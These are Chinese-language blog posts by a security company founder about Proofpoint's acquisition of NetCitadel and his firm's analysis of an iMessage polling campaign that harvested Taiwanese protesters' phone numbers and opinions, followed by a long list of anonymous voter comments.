為何要創辦公司?因為可以依自己的理想選擇團隊、建立文化。今天剛好是阿碼加入 Proofpoint 一週年,今晚同事都累了,先回房睡,沒來跟我們吃。七十幾個人,併購後一年,沒人離開。我跟這群人從大學做室友、做同學、做朋友,至今也快二十年了。從一起創立交大蛋糕社,到一起做大專佛學營幹部,到成為鄰居,到做阿碼,大家之間的默契,早是辛苦中最大的動力與快樂。我下飛機到旅館,其實就想要回家了,此城真非我菜。但是今晚,Le Cirque 讓我想起了阿碼的美好,也給了我動力,繼續完成這兩周的行程。<br>
<br>
阿碼科技創辦人 黃耀文 Wayne<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_Eei9SsicSMUS-zPZnhyphenhyphenFPEpo4cz2l1z7D9Bl40R1Ib_Gb-3-64UZ0uQIjR6YTIDG6om8f0bqkmXimqQbuf6J4XueN9BV-UlZHGRSJL-u45J2qeifATYumuQR7cC6zFwQLAqsN1oqWSU/s1600/defcon+2014+22+trip.jpg" /><br>
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-37101991017076589242014-05-23T05:03:00.000+08:002014-05-23T05:28:09.150+08:00Proofpoint、阿碼赴紐約時代廣場納斯達克敲鐘,並宣布併購 APT 防禦公司 NetCitadel<img border="0" src="http://1.bp.blogspot.com/-2KYLfBerLnY/U34fVHYgTlI/AAAAAAAAAzM/JOITWr8Vsu0/s1600/nasdaq-timesquare-750.jpg" /><br>
<img border="0" src="http://1.bp.blogspot.com/-XwZ1ed8sbfo/U34fWZ_1J4I/AAAAAAAAAzg/fbjkHXAClSM/s1600/wayne-nasdaq-modified-750.jpg" /><br>
<img border="0" src="http://4.bp.blogspot.com/-NjdttSqu0N0/U34fU1F17jI/AAAAAAAAAzQ/JzfLInZIFX0/s1600/marketsite3-750.jpg" /><br>
<img border="0" src="http://3.bp.blogspot.com/-EhlpgHfJJKI/U34fU5DsMsI/AAAAAAAAAzI/f3Qhw3UBZeI/s1600/mo052014_hires-2-750.jpg" /><br>
<br>
在紐約曼哈頓的時代廣場上,面對著紐約時報總部的時代大樓,其每年最後一天的降球儀式,為紐約市民慶祝新年時的主要地點;左手邊是象徵著美國高科技與資本主義的納斯達克總部,右手邊則是象徵著美國音樂文化發展的百老匯。在這裡設立總部的還包含了路透社、安永會計師事務所(Ernst & Young)、摩根史坦利(Morgan Stanley)與MTV等。<br>
<br>
今天,我們來到這裡的納斯達克總部,為納斯達克開市敲鐘,也發表我們在 APT 防禦方面的最新併購案。<br>
<span class="fullpost">
<br>
有了阿碼這隻超強生力軍加入後,APT防禦將是整個 Proofpoint 往後的重點發展方向,而幫公司評估適合的併購對象,也成為我加入後的重點工作之一。完整的 APT 防禦,需要多種技術相互組合,而 <a href="http://www.netcitadel.com/">NetCitadel</a> 擁有的獨特全自動事件處理機制,正是我們客戶急需要的一塊。<br>
<br>
各位知道,阿碼的 APT 惡意文件與網址偵測技術獨步全球,可以很有效地真測出零時差威脅。APT 翻成中文是「先進持續性威脅」,所以我們今天真測出此威脅,並不表示攻擊者今天才開始攻擊:極有可能,他已經攻擊一段很長的時間了,而往後,他仍然會持續進行攻擊。所以偵測到某威脅時,有幾個很重要的問題:<br>
<br><strong>
<ol type="1">
<li>今天,我們保護了該使用者,但是過去,在客戶還沒使用阿碼之前,有沒有其他人已經被感染了?</li>
<li>而往後,如何確保其所有他同事皆不被該攻擊感染?</li>
<li>如何將需要「資安專家」人工甚至到場處理的諸多動作,給自動化?</li>
</ol><br></strong>
<br>
這該如何達成呢?假設客戶某員工被我們檢測出來,收到了針對性攻擊的惡意文件,那麼我們是否能夠全自動地完成以下動作:<br>
<br>
<ol type="a">
<li>透過動靜態合一的分析,取得該惡意文件之最終目的:要植入的惡意程式,或要執行的機器碼(shellcode)</li>
<li>將該惡意程式的感染痕跡,當場做全自動的特徵取樣</li>
</ol>
<br>
如果可以做到以上,那麼我們就可以進一步地說:我們知道感染後的特徵了。<strong>這邊的重點,是「痕跡」。</strong>我們的沙箱與動靜態檢測,可以有效錄到整個感染的「行為」:期間,被呼叫的 API、產生的暫存檔、對記憶體的操作(如 heap spraying)等等都是。問題是,行為不是痕跡:行為,要於感染的過程中全程監控,才可以錄到,而對於一台正被使用中的電腦,如果要知道「是否已經被感染」,則我們需要的是能夠<strong><font color="red">在我們的沙箱分析中,不但能夠自動分析識別惡意「行為」,而還要能夠更進一步地自動分析出感染後之「痕跡」</strong></font>。<br>
<br>
今年,在阿碼諸多同事的努力下,我們研究出了可以達成的技術!那麼接下來,我們需要有一套裝在每台電腦上面的軟體,持續不斷接受我們的引擎所自動分析出來之「感染痕跡」,並做以下處理:<br>
<br>
<ol type="a">
<li>掃描該電腦,確定是否有被感染?</li>
<li>如果有,則立刻通知管理者,</li>
<li>立刻自動跟網路上的防禦設備(如防火牆、IPS、UTM等)聯絡,請所有相關設備立刻阻擋一切與受感染機器相關之網路封包,等於將該機器自動拔除網路,</li>
<li>立刻自動跟網路上的防禦設備(如防火牆、IPS、UTM等)聯絡,針對我們自動截取判斷出來的惡意網域,封鎖一切封包,等於封鎖企業內部任何對於這些外部惡意機器的任何連線。此點可以將保護範圍擴大為企業內部的所有電腦,而不僅限於被我們測出來受感染者。</li>
</ol><br>
<br>
如此一來,我們就可以將我們自動偵測到的零時差威脅的應用擴大,運用「一即一切」的原理,從防衛一個時間點,擴展到防衛過去與未來的感染;從偵測到針對某員工的攻擊,擴展到對全部員工的防禦,並且能夠在發現威脅後,做最有效的即使處理,立刻阻隔攻擊者,防止資料外洩,降低損失。<br>
<br>
要能夠支援多家的防火牆與網通設備,以及發展這樣一套在電腦上面常駐的「感染痕跡掃描器」,以阿碼現有的資源,可能需要一整年的時間,在諸多客戶表達極度需求的情況下,我們開始往併購方面努力。我們有兩個選擇:a) 找具有相關經驗的公司,併購後,請他們放棄目前產品,全力投入開發我們要的上述,或 b) 找公司是剛好有開發出上述需求的。<br>
<br>
很幸運地,<a href="http://www.netcitadel.com/">NetCitadel</a> 正是 (b)!可是因為市場上專注於此之公司很稀有,大家都想要,併購的過程可說是一波三折,從原本年初我們覺得確定無望,大家相互安慰,到後來峰迴路轉,我方勝出,讓我覺得在商場上打拼,一半是努力,一半真的是命啊!<br>
<br>
Proofpoint 在矽谷的公司中並不算大,我們于納斯達克上市也才兩年多。但是每每看到同事這麼地努力,處處想辦法提供客戶最好的產品,最好的服務,希望可以獲得客戶的青睞,都會很感動,也希望阿碼這邊一直持續創新,把東西做得更好。<br>
<br>
的確,我們要的,不是漂亮的辦公室或出差時的高級旅館,我們要的,是客戶的肯定,是大家技術的提升,是一個能讓我們持續創新的舞台,是資源讓我們能夠持續併購與我們有相同夢想的團隊加入。新創公司,就是這麼令人著迷!<br>
<br>
最後我想說,雖然感覺外面都是我在「出沒」與發聲,而今天我的照片也在時代廣場的大電視牆上了,但是我比任何人都清楚,能夠有今天的成績,是整個團隊七十幾人一起的努力,我只是大家推派出來的代表,或許因為我程式沒大家寫得好,但是我肯坐飛機吧!<br>
<br>
對軟體產業來說,人才就是資產,人才就是一切,我們靠的是腦袋與創意而非資本,我們創出的是高利潤的服務而非高污染的工廠!很感謝這幾年一直默默在背後付出的阿碼團隊,你們實在是太辛苦了,我講不出什麼,只能夠說,真的謝謝各位!也謝謝一路以來支持我們的客戶跟長官,沒有您們的支持,阿碼不會有今天,而我們回報的方式,就是繼續努力奮鬥下去,並希望政府能認同台灣軟體產業的實力,扶植出更多成功的軟體公司!<br>
<br>
Wayne 於紐約<br>
<br>
附錄:<br>
<br>
Proofpoint 官方<a href="http://www.proofpoint.com/about-us/press-releases/05202014.php">新聞稿</a><br>
<br>
NetCitadel規格<br>
<img border="0" src="http://3.bp.blogspot.com/-4OOBj5S1vM8/U35DsiGd2_I/AAAAAAAAAzw/egVZPXQttM8/s1600/netcitadel.png" /><br>
<br>
<strong>支援之 APT 偵測來源:</strong><br>
<ol type="1">
<li>阿碼證點(Proofpoint TAP)</li>
<li>FireEye MPS</li>
<li>Palo Alto Networks WildFire</li>
<li>HP ArcSight</li>
<li>QRADAR</li>
<li>GeoIP</li>
</ol><br>
<br>
<strong>支援之網通設備:</strong><br>
<ol type="1">
<li>Cisco ASA</li>
<li>Cisco IOS</li>
<li>Cisco NX-OS</li>
<li>Juniper SRX (JUNOS)</li>
<li>Check Point</li>
<li>Palo Alto Networks</li>
<li>Fortinet FortiGate</li>
</ol>
<br>
<br>
Photo credit:<br>
Copyright 2000-2014, The Nasdaq Stock Market, Inc.<br>
Reprinted with the permission of The Nasdaq Stock Market, Inc.<br>
Photo credit: Peter Aaron/Esto<br>
<br>
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-41263108110471146432014-05-14T13:16:00.000+08:002014-05-14T18:03:59.127+08:00某機關正利用駭客針對台灣街頭運動者進行大規模個資蒐集<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKdOtW7K2W6etAM6KKGub8UkBP1QicnIuMzYcwp4kfmeV98X4hXKfYOVEc3eWkceje-JGPv4avCdowr9vZCqXgRIX11muIgQVIzbVJvDDIeCOLHjb02mwI2mytbqpcy33x-vnFBz5vyk/s1600/imessage-voting-targeted-attack-1-1.png" /><br>
<br>
日前台灣很多人在 iPhone 上都收到了民調的簡訊 (iMessage),邀請民眾對於服貿與核四等議題,做線上的投票。投票題目到目前為止有兩題:「服貿是過還是死」以及「核四廢存之爭」。很快地,台灣知名資安公司<a href="http://devco.re/">戴夫寇爾(DEVCORE)</a>創辦人<a href="http://devco.re/about/">翁浩正(Allen Own)</a>先生,即發表<a href="http://devco.re/blog/2014/05/07/vote.tw.am-potential-phishing-site/">部落格文章</a>表示,此舉為駭客所為,請民眾小心。文章末,Allen 寫道:<strong>「究竟這件事,是有網站大量洩漏個資,還是有人在民運期間利用這股熱潮蒐集個資,抑或是背後有什麼不可告人的秘密呢?讓我們繼續看下去~」。</strong><br>
<br>
阿碼科技也於同時間注意到此波攻擊,然因獲得資料量龐大,到今天才有初步之攻擊細節分析,那麼就讓我們來玩一下文章接龍,讓我們繼續看下去:iPhone 簡訊攻擊第二回:不可告人的秘密,幕後黑手何方神聖?<br>
<br>
<strong>[初步重點整理]</strong><br>
<br>
在初步夢到我們獲得了駭客團體的許多資料後,我們先做出以下結論,這些都是之前沒有人提及的:<br>
<br>
1. 駭客團體位於大陸,以曾任職上市公司之某資深架構師為首,帶年輕工程師以及學生共事。該團體人員之詳細資料,我們不公開。<br>
<br>
2. 駭客掌握超過<strong><font color="red"><strike>五千萬筆</strike></font></strong> iPhone 民眾的電話號碼,<strike>大部分為大陸與台灣的使用者</strike>。<strong><font color="red">(更新:駭客掌握超過 八千萬筆 民眾的電話號碼,其中大陸民眾 三千萬筆,全球民眾五千萬筆,台灣則有 1,346,378 筆)</font></strong><br>
<br>
3. 只要有投票的民眾都會被紀錄:電話、選擇(支持或反對)、IP 位址,成為極為有效的針對性名單。目前服貿議題投票者超過一萬四千人,而核四投票者超過一萬兩千人。<br>
<br>
4. <strong>此種攻擊,由於投票時並不需要輸入姓名,故會讓人有「匿名投票」的錯覺,而實際上由於每個人收到的網址不一樣,所以投票時,系統知道是誰在投票,並會做完整記錄。這絕對不是匿名投票!</strong>
<br><br>
5. 下一波攻擊的題目已經出爐,題目為:<strong><font color="red">「下一次你是否會走上街頭?」,選擇為「我會走上街頭直接表達訴求」或「我會選擇其他方式表達意圖」。筆者認為這個題目更加具有針對性,直接針對準備上街頭者進行掌握。</font></strong>此波攻擊尚未被發動,筆者這裡公布後,是否仍會被發動,不一定。<br>
<br>
6. 受騙民眾投票後,可以看到當時大家投票的結果分析,此為<strong>真實的分析。目前服貿議題的一萬四千多票中,服貿過:52.4%、服貿死 47.6%,而核四超過一萬兩千票中,支持核四燃料填充:45.9%、徹底停止核四建設:54.1%。</strong>(有沒有駭客做的民調不能公布的掛?)<br>
<br>
7. 駭客自行研發軟體,可自動註冊蘋果的 iTunes 帳號並加以管理。目前擁有約五千兩百多筆 iTunes 帳號。<br>
<br>
8. 駭客同時研發監控新浪微博上的發言,以便掌握民眾於社群網路上之發言,可根據指定名單或指定之關鍵字追蹤。<br>
<br>
9. 駭客自行研發並使用以下軟體:<br>
<ol type="A">
<li>自動註冊並啟用 iTunes 帳號以便發訊息(iMessage),註冊時使用 PHP 語言撰寫,連線透過 VPN 做跳板,以混淆來源 IP。</li>
<li>自動發 iMessage 簡訊,使用 C 語言撰寫(真復古),發信時透過 VPN 做跳板,以混淆來源 IP。</li>
<li>管理掌握之民眾手機號碼清單,並以省或市為單位,做數量上的統計。PHP,資料庫使用 MySQL 與 Redis(五千多萬筆了,需要導入一些大資料技術)。</li>
<li>監控新浪微博上的發言,使用 PHP、MySQL、Redis</li>
<li>串接 VPN 做跳板,支援以下 VPN 廠商: StrongVPN、VanishVPN、VyprVPN、ExpressVPN、Hide My Ass!等。</li>
</ol>
<br>
<strong>[推理與分析]</strong><br>
<br>
該組織長久以透過非法管道取得民眾電話,然後代發 iPhone 訊息廣告獲利。此種商業模式很簡單:業主付錢,將想推廣的網址給駭客集團,駭客集團發出垃圾簡訊推廣並收費,而雇主得到的就是瀏覽次數 (page view)。然而,此次該集團受委託一連三次發送台灣火熱議題之相關民意調查簡訊,試問,委託者目的何在?<br>
<br>
筆者認為可能有二: (一〕委託者希望獲得民調參考數據,或者 (二〕委託者希望獲得持有某種意見民眾之手機號碼。然而,如果目的是〔一〕獲得數據,則無法解釋第三波的題目:「下一次你是否會走上街頭?」。有多少人會上街頭,這種數據並不太具有參考價值,但是,<strong>一份準備上街頭的民眾的手機號碼清單,卻非常有價值</strong>,故筆者認為委託者之動機為後者。<br>
<br>
<span class="fullpost">
<strong>[小結]</strong><br>
<br>
我們會持續追蹤此種攻擊,以及委託者之動機。民眾收到不明簡訊,一定要非常小心,誤亂點連結(開網頁)。<br>
<br>
發文者:阿碼 <a href="https://www.facebook.com/wayne.armorize">Wayne</a><br>
<br>
<strong><font color="red">更新:結果第三波攻擊還是發動了,請大家小心!</font></strong><br>
<br>
<strong>[夢中看到的資料憑記憶畫出來]</strong><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq0ZK8OQG9xRnsROzLrLqPCtL4MErXlY77lShyphenhyphenHbv2FUJL_qnvpFfGrwrFpitVjFfm2E3HQkkcVpIUIgvE_UeoXNGUHjCBW0SzJfaD28ahtxc2unNFvamqvWXIOikPSTnBG_laPRX3eqI/s1600/imessage-voting-targeted-attack-2-resized.png" /><br>
(上圖:下一波攻擊)<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT-k8AbXehxGhYE8xtP0DnwAhr4c4pqUwr2pqD1IK7y6cefNNexbvo7IvYMERf223kcGAwBR452NsPKU3g5XhOAc75NMG4lnqp8Bfxp3TioSxIQmq9jatGa2anU8sqp8EBmfA3vKAK9LQ/s1600/imessage-voting-targeted-attack-4.png" /><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ-UF2HlmLVfDYSWto0d-BhGjWINAIZiacP-Rdbj0d2ER2N6yBD-4fpZkch_m81d8Ag_w224zDmd5_XtGGWHWM70eWYhJmT95r0WQP5WaadTnDVYhFZZFqtOPS69ro0gLj5qxzYiP7Aog/s1600/imessage-voting-targeted-attack-3.png" /><br>
(上圖:管理後台,顯示民眾對於核四的意見)<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitmDw65M5dUr_XPSpvwK3wytmxUwELbW50-V30LEwORKglP9VhK1ki3ljs2-Vw4yMuao7l6cz2d_Fi0UpVYgSj9GYUp-kMsFlnIIzcuQ6G3tVhj1Lh3Z6rGP4Edu8sLHkSzro7eUhRWkU/s1600/imessage-voting-targeted-attack-5.png" /><br>
(上圖:民眾手機號碼與 IP 位址)<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjILrRDnlaPlnP2KpvqoEakQbN5M43AD2oF0clz_ASUFLFmILw7mwMgdJtBbBttWi8rIdu91KfeSG73SESxRmqL91m405Lfdaw0hkfRZJLfFS85DlPh3E9dIevr6bntYxd1E2__JYZ2KeM/s1600/imessage-voting-targeted-attack-6.png" /><br>
(上圖:駭客掌握超過<strike>五千萬筆</strike> iPhone 使用者的電話號碼)<strong><font color="red">(更新:駭客掌握超過 八千萬筆 民眾的電話號碼,其中大陸民眾 三千萬筆,全球民眾五千萬筆,台灣則有 1,346,378 筆)</font></strong><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh34leMEWcVgCQ5KynyfOkC-RhGderv1prq1DT_lsljZIDNiWKGoGnl13xRoALAb8u_gGqKuMQv4ja8wvU6Uzy8NEjiDIdiL-zgzYJvxyZSESbyuqAkIFgy_j_0c-kYaiCstsW-RhR0YZ8/s1600/imessage-voting-targeted-attack-7.png" /><br>
(上圖:發詐騙簡訊的介面)<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSk-GIGW7JCm09NirbX19Mri_v0_IuobicxZQEm53zUSehOuL2cqRKrJT_9EzYKiktFyf3WtAnuMn5scz-pY3MWBH4mzuei2nQgyi4eb5qwJKux2Vd0wWnS-89ngF5WmPeJEU81cIld9M/s1600/imessage-voting-targeted-attack-8.png" /><br>
(上圖:自動註冊並啟用 iTunes 帳號,PHP 程式)<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJnPZshxT8SubayY7cElIis9cexZpvgYi5PkE0vq_dFJZmlqN-RyK0ljdB1Y5Q2SSgtxUbJGzaTczD-NLgwRPZNFw2PiByaW1GC4jT1QGPNwmSRSRHlHnWgPuYCAxzxmc9J42QdjZ8NgI/s1600/imessage-voting-targeted-attack-9.png" /><br>
<br>
(上圖:自動發送簡訊 iMessage,C 程式)<br>
<br>
<strong>[部分服貿民眾意見]</strong><br>
<hr>
我們公布駭客蒐集到的部分民眾<strong>服貿</strong>意見如下:
<hr><br>
【❗❗超越藍綠,公民自救❗❗❗服貿是「過」還是「死」,我們來選!
<br><br>「史上頭一次」聽起來是不是很爽
<br><br>不公開,不逐條審議,不能改,就是死
<br><br>不平等的服貿當然要讓它死!
<br><br>不用怕走出去吧!台灣加油!
<br><br>不用核電採用石化燃料將造成霾害及溫室效應,氣候改變,是全球性的災難難以挽回。
<br><br>不可以為達目的,?牲民主法治與社會秩序與安定,帶來動蕩與不安。一切應法符程序正義。
<br><br>不可以做井底之蛙,大陸人沒有什麼可怕的,台灣人要有自信!但是一定要做好監督,不可以亂了原則!
<br><br>不可鎖國,有競爭才會進步,危機就是轉機不要害怕或膽怯,世界各國都在進步,不受其他素影響,凡事不嚐試一味排斥,是不智。
<br><br>不加入服貿台灣會被邊緣化,等同不是國際的一份子!
<br><br>不再沈默!
<br><br>不足成事
<br><br>不怕餓死
<br><br>不知
<br><br>不看蘋果報丫
<br><br>不是不能過!要重新審議再來談要不要接受!
<br><br>不是用吵的就能達到目地?民主社會用選票決定?反對的可以下次選舉再努力?不是用吵用?的?悲哀
<br><br>不是全然不好,要審慎依法審查
<br><br>不是幾些人佔據台北機關,就要全國人聽他們的,有本事叫他們去選立委選總統嗎
<br><br>不是會吵的孩子,就有糖可以吃。
<br><br>不是
<br><br>不要一昧反對而不思考
<br><br>不要工廠,卻要高薪,
<br><br>不要用造假的懊步數
<br><br>不要成血腥紅色中國人。
<br><br>不要再口口聲聲說你代表台灣人民。每個人只能代表自己。
<br><br>不要再寄來了。
<br><br>不要再傳來訊息!
<br><br>不要再傳垃圾簡訊了
<br><br>不要再鎖國,如果你認為台灣是一個國家的話。溫室裡的花朵不會長久,提高生存競爭力是自然界的法則。
<br><br>不要在吵了,
<br><br>不要在鎖國了
<br><br>不要把任何事都政治化 很多國家可以
<br><br>不要把沈默大眾當死人!
<br><br>不要吧大家的精力,都耗在政客的自我
<br><br>不要怕競爭,台灣小孩因父母可供資源太多,導致很怕跟國際競爭,以為只有??門就可以活,台灣學政治及法律的要負最大責任。
<br><br>不要怕競爭怕沒有競爭力國家要走出去 才有機會!
<br><br>不要怕競爭
<br><br>不要固?自封
<br><br>不要服貿,韓國要!
<br><br>不要服貿!更不要核四!
<br><br>不要服貿
<br><br>不要為反對而反對,任何事情都是兩面我們的實力不容忽視
<br><br>不要透過別人思考過的發言來決定事情
<br><br>不要黑島化要全球化
<br><br>不要亂了,幹
<br><br>不要過於放大其中一項
<br><br>不要過
<br><br>不要龍燈,中國要!
<br><br>不要鎖國,要閞放
<br><br>不要懼怕大陸,兩邊各一國,國對國的思維,服貿一定要簽。
<br><br>不要讓下一代痛恨這決定
<br><br>不要讓無知的人。毀了台灣
<br><br>不能一字不改通過
<br><br>不能再鎖國了,服貿要過才是!
<br><br>不能單純的過還是死二分法來看,應該有配套條件的過,受惠的一方有責任協助受損的弱勢族群,讓台灣人都幸福,停止綠藍惡鬥。
<br><br>不能通通要別人讓利,再不通過,年青人失業更多。
<br><br>不能通過,過了只有死路一條
<br><br>不能過!自經區也該再重省查!
<br><br>不能過
<br><br>不能鎖國,去做對的事,躲起來就可以不去面對競爭嗎?
<br><br>不能鎖國
<br><br>不能鎖國,否則只有待以自斃。
<br><br>不能讓少數暴力綁架台灣多數沈默人的權益。
<br><br>不能讓暴民支配民意ˋ
<br><br>不接受綁架式民主。
<br><br>不僅服貿要過,核四也要續建。反核所舉福島核災圖片,大部份是海嘯引起而非核電廠造成。反核者移花接木誤導民眾,居心叵轍. 更隱藏有政治目的。
<br><br>不開放,只有死!
<br><br>不開放必死!
<br><br>不開放競爭國際化台灣會退化以後必須更依賴中國救濟,更能被統一,這次服貿及反核四全被政客操作,是非不分亡國之兆。
<br><br>不想看到大陸狗帶著他們的小孩來隨地亂拉屎
<br><br>不想被赤化
<br><br>不想被邊緣化!
<br><br>不想當啊陸仔
<br><br>不過,一定死!過了不見得死!
<br><br>不過,只能被邊緣化;不過,只能繼續領22K;不過,拿懶x跟人比雞腿嗎?
<br><br>不過,台灣才會死。
<br><br>不過。台灣只會更差 不會更好。不要讓自己把自己推向邊緣化
<br><br>不過大家就等吃自己吧 不願意改變只能接受市場淘汰
<br><br>不過台灣就永遠經濟鎖國吧
<br><br>不過的話,對方還有wto,反正不開放後面台灣也很難跟韓國玩,那不如就過了他,這樣貨貿才好談
<br><br>不過服貿都是政治操作!開放才有競爭!競爭才會進!潛能才能發揮!
<br><br>不過則亡
<br><br>不過是封死自己
<br><br>不過是穩死,過了還有機會!
<br><br>不過做生意跑光沒有人來投資
<br><br>不過就死。過了就不一定死
<br><br>不過就是死。
<br><br>不過就是死
<br><br>不過就是等死
<br><br>不過等死
<br><br>不過等於死台灣經濟,害怕與大大陸人競爭,等於失去國際舞台。
<br><br>不過等於等死
<br><br>不過跟不上腳步
<br><br>不過應該會很慘
<br><br>不管是服貿還是核四,我覺得對台灣都是有必要的,但是我不信任馬政府簽的服貿協議是利大於弊,同樣也不信任馬政府蓋的核四安全無慮,所以不管是馬政府簽的服貿還是蓋的核四,我寧願選擇都不要,因為寧缺誤濫!!
<br><br>不說謊才是號外!他說好,你就相信?
<br><br>不論現在或未來?不願被國家當個魁儡、當個人頭!
<br><br>不懂?
<br><br>不懂
<br><br>不懂?何無法制裁這些少數自大?人
<br><br>不簽代表我們不是國家,已經和大陸統一。簽了代表我們是個獨立國家,合作需經我們同意。
<br><br>不簽 台灣將來會更依?大陸,甚至邊緣化!
<br><br>中共不等於民主!台灣人請小心選擇,別一時糊塗!別有奶便是娘,香港是最好的例子。
<br><br>中國已經是世界第二大經濟體不容忽視!如果換成歐美任何一個國家要簽,早就開香檳慶祝了
<br><br>中國只因國父遺志,三民主義統一新中國才對台灣好,非洲已被中國佔有,台灣那麼小,又每天吵吵?,這些政客只為了奪權標工程,竟然有那麼多幼稚的人在支持。
<br><br>中國是敵國!我為什麼要和他往來?
<br><br>中國賺你的錢,叫做欺人太甚;
<br><br>中國讓你賺錢,卻叫做收買人心。
<br><br>中國讓制的最終目的是什麼?就算現在已陷入死泥淖,也要跳出來走自己該走的路。
<br><br>中道?正道的聲音要講出來,不能讓自己當縮頭烏龜。
<br><br>什麼拼經濟?都是騙人的!!!
<br><br>什麼是(?貿「死」)要說明清楚,要投票語意都
<br><br>什麼時候才要在新聞上公佈?
<br><br>今天如果是跟美國簽服貿還有那麼多人會反對嗎?
<br><br>今日香港明日台灣 和中國太近死的會快點
<br><br>內需有這麼小
<br><br>公平貿易怕啥
<br><br>公投決定
<br><br>公開,透明,公正,?不受專業投機份子,或被收買的政客控制,立院全部分別項目且記名投票,公開給社會大眾知道他個人立場,不要利用選民託付古老名辭來騙我們,這樣政府逐條秀出問題,立委記名投票,媒體公開資料,台灣才有真正前途,我們要的不多,但要平安喜樂而且有前途的台灣。
<br><br>公開,透明,受人民監督,經多數人同意即可
<br><br>公開透明。宣導完善。
<br><br>分區開放,將稅收加倍成長,
<br><br>勿再耍猴戲
<br><br>勿黑箱做業
<br><br>反!服!貿!
<br><br>反之支持服貿的人,只要不過就會產生變化
<br><br>反反服貿!反核四。
<br><br>反正天塌下來有大人會頂著。我常在想,如果他們是朝著白宮衝刺,會發生什麼事?為什麼他
<br><br>反到後面完全失焦 很可笑
<br><br>反旺中壟斷,又不反年代壟斷。
<br><br>反的是黑箱,不是服貿。
<br><br>反服貿+反核四+反
<br><br>反服貿,反黑箱作業,反對核四
<br><br>反服貿,反黑箱作業!台灣人民萬歲~~~
<br><br>反服貿之名,行台獨之實,當我們是白疵啊
<br><br>反服貿反到底。寧願服貿死,就是不要過!
<br><br>反服貿的、請不要再煩人啦、帶壞小孩子。
<br><br>反服貿的人眼光狹隘,意在鎖國,只能造成台灣經濟衰退,這真是台灣人的悲哀。
<br><br>反服貿的目的、只想壞執政黨、形象、執政無能假象、奪取執政、犧牲國人福利、取得執政後、蓋括承受、包括核四、這樣不是誤國、誤民嗎?
<br><br>反服貿者如同清朝反自強運動者一樣,怕引進火車就會?自己失業的搬運伕,去把蓋好的鐵路拆了,阻擋一時,也阻擋不了時代的巨浪,當初的反對者,只是把中國推向更悲慘的命運!
<br><br>反服貿就是反繁榮進步
<br><br>反服貿
<br><br>反服貿 非核家園 自己國家自己救
<br><br>反黑箱服貿
<br><br>反黑箱
<br><br>反黑箱 還有自經區!!!
<br><br>反對自由貿易
<br><br>反對的學生無知
<br><br>反對服貿
<br><br>反對法西斯誤國
<br><br>反對意識形態的抗爭,沒有正義,沒有理性,只為反對執政者的政策!
<br><br>反對黨就是要馬政府下台、拿下執政權、這才是它們的真正目的、反服貿只是手段而已啦!
<br><br>天佑台灣,天佑中華民國。
<br><br>天佑台?!
<br><br>太多的政客,太多的權謀。少點名嘴,多點建設
<br><br>太?權了
<br><br>少在那邊愚民,當人智障阿
<br><br>少數不能決定我們的末來。
<br><br>少數人不能「包裝」自己真正的「企圖」而讓台灣「委縮」
<br><br>少數人不能用暴力代表我們沈默的多數
<br><br>少數人占立院,其實不能代表我發聲
<br><br>少數人綁架全民
<br><br>少數服從多數才對啊!
<br><br>少數激進的人,不能代表大多數人,採取絕食、佔領等綁架手段均非正當,試想若所有人都以這種不合我意就強壓別人的粗暴行為,那不天下大亂嗎?循民主程序,少數服從多數,多數尊重少數,這樣的民主素養,都是因為立法院的亂象給帶出來的,所以我主張代議制度必須修正,言論免責必須調整,行為必須有所規範並訂定準則,現今立法院實乃亂源也!難足以為民喉舌,難足以為民表率,悲哀也!
<br><br>尤其是一些小企業
<br><br>尤其是經濟
<br><br>支持支持我要工作要飯?要進步要?錢請問抗議者你們要不要生活吃飯每次抗議民脂民膏造成他人的生活傷害了他人求生活溫飽的權力是對嗎?你們抗議者都很有錢可以不用工作就有吃香喝棘的請考慮一下善良的無知的百姓不過只求溫飽一一一一不要在亂了…
<br><br>支持服冒的等你們後悔就來不及了!
<br><br>支持服貿,走出更寬闊的未來
<br><br>支持服貿過
<br><br>支持服貿
<br><br>支持服貿 才有生活品質
<br><br>支持服貿 救台灣!
<br><br>支持政府政策,讓經濟回升,增加就業率。
<br><br>支持飛帆、為廷.
<br><br>支持通過
<br><br>支持經濟及競爭力成長
<br><br>方能安泰
<br><br>方擺在前頭的老弱婦孺。這些有心人仕表面上提供物資,醫療以及法律的支援,但內心其實存
<br><br>日子如果想繼續過,服貿必然要過,我支持服貿通過。
<br><br>王偉忠~別跳針
<br><br>一到選舉全台灣就亂 過不過根本不是重點 全在於我們的政治說到底就是亂
<br><br>一定要過,不然台灣更慘丫,
<br><br>一定要過。
<br><br>一定要過服貿,台灣人不能封閉,我們不怕競爭只怕不爭氣
<br><br>一定要過
<br><br>一定要讓他死
<br><br>一定會過,但是會過的很坎坷,並且引起國際關注。早知一定會過的議題,學運又何必出來干擾?搞的我這邊大陸通商受到一點干擾,又浪費社會資源。
<br><br>一定會過
<br><br>一定過
<br><br>一相情願旳認為把所以旳合作都一定要和中國合作、無疑是把 所有雞蛋放在一個藍子、不小心碰到就全破
<br><br>一個人口14億,一個人口2300萬。
<br><br>一個最高者,需有看事情的高度;而不是什麼都看民意,那國家方向可憂
<br><br>一堆假資料
<br><br>一票都不會給你們KMT !幹!
<br><br>一群為反對而反對的猧齰家伙,厚顏無恥的妄稱民意,就誏它們去死吧
<br><br>乃哥
<br><br>千萬不要輸給其他國家!
<br><br>人民才是國家的主人
<br><br>人民有公民權 「不聽話的人民,才有聽話的政府;聽話的人民,造就獨裁的政府。」
<br><br>人生阿
